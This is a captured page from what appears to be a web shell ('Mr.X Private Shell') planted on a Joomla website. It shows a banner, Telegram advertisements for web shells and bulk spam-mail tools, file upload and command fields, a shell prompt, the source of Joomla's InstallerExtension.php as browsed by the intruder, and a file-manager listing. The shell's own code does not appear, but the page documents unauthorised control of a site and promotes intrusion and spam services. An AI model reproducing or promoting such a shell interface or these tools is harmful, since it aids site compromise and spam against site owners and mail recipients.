__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

/**
 * Joomla! Content Management System
 *
 * @copyright  (C) 2008 Open Source Matters, Inc. <https://www.joomla.org>
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 */

namespace Joomla\CMS\Installer;

use Joomla\CMS\Application\ApplicationHelper;
use Joomla\CMS\Language\Text;
use Joomla\CMS\Log\Log;
use Joomla\CMS\Object\LegacyErrorHandlingTrait;
use Joomla\CMS\Object\LegacyPropertyManagementTrait;

// phpcs:disable PSR1.Files.SideEffects
\defined('_JEXEC') or die;
// phpcs:enable PSR1.Files.SideEffects

/**
 * Extension object
 *
 * @since  3.1
 */
class InstallerExtension
{
    use LegacyErrorHandlingTrait;
    use LegacyPropertyManagementTrait;

    /**
     * Client ID of the extension
     *
     * @var    int
     * @since  4.3.0
     */
    public $client_id;

    /**
     * Filename of the extension
     *
     * @var    string
     * @since  3.1
     */
    public $filename = '';

    /**
     * Type of the extension
     *
     * @var    string
     * @since  3.1
     */
    public $type = '';

    /**
     * Unique Identifier for the extension
     *
     * @var    string
     * @since  3.1
     */
    public $id = '';

    /**
     * The status of the extension
     *
     * @var    boolean
     * @since  3.1
     */
    public $published = false;

    /**
     * String representation of client. Valid for modules, templates and languages.
     * Set by default to site.
     *
     * @var    string
     * @since  3.1
     */
    public $client = 'site';

    /**
     * The group name of the plugin. Not used for other known extension types (only plugins)
     *
     * @var string
     * @since  3.1
     */
    public $group = '';

    /**
     * An object representation of the manifest file stored metadata
     *
     * @var object
     * @since  3.1
     */
    public $manifest_cache = null;

    /**
     * An object representation of the extension params
     *
     * @var    object
     * @since  3.1
     */
    public $params = null;

    /**
     * The namespace of the extension
     *
     * @var    string
     * @since  4.0.0
     */
    public $namespace = null;

    /**
     * Constructor
     *
     * @param   ?\SimpleXMLElement  $element  A SimpleXMLElement from which to load data from
     *
     * @since  3.1
     */
    public function __construct(?\SimpleXMLElement $element = null)
    {
        if ($element) {
            $this->type = (string) $element->attributes()->type;
            $this->id   = (string) $element->attributes()->id;

            switch ($this->type) {
                case 'component':
                    // By default a component doesn't have anything
                    break;

                case 'module':
                case 'template':
                case 'language':
                    $this->client  = (string) $element->attributes()->client;
                    $tmp_client_id = ApplicationHelper::getClientInfo($this->client, 1);

                    if ($tmp_client_id == null) {
                        Log::add(Text::_('JLIB_INSTALLER_ERROR_EXTENSION_INVALID_CLIENT_IDENTIFIER'), Log::WARNING, 'jerror');
                    } else {
                        $this->client_id = $tmp_client_id->id;
                    }
                    break;

                case 'plugin':
                    $this->group = (string) $element->attributes()->group;
                    break;

                default:
                    // Catch all
                    // Get and set client and group if we don't recognise the extension
                    if ($element->attributes()->client) {
                        $this->client_id = ApplicationHelper::getClientInfo($this->client, 1);
                        $this->client_id = $this->client_id->id;
                    }

                    if ($element->attributes()->group) {
                        $this->group = (string) $element->attributes()->group;
                    }
                    break;
            }

            $this->filename = (string) $element;
        }
    }
}

Filemanager

Name Type Size Permission Actions
Adapter Folder 0775
Manifest Folder 0775
Installer.php File 77.52 KB 0664
InstallerAdapter.php File 37.77 KB 0664
InstallerExtension.php File 3.99 KB 0664
InstallerHelper.php File 11.55 KB 0664
InstallerScript.php File 12.46 KB 0664
InstallerScriptInterface.php File 2.26 KB 0664
LegacyInstallerScript.php File 5.42 KB 0664
Manifest.php File 2.64 KB 0664
Filemanager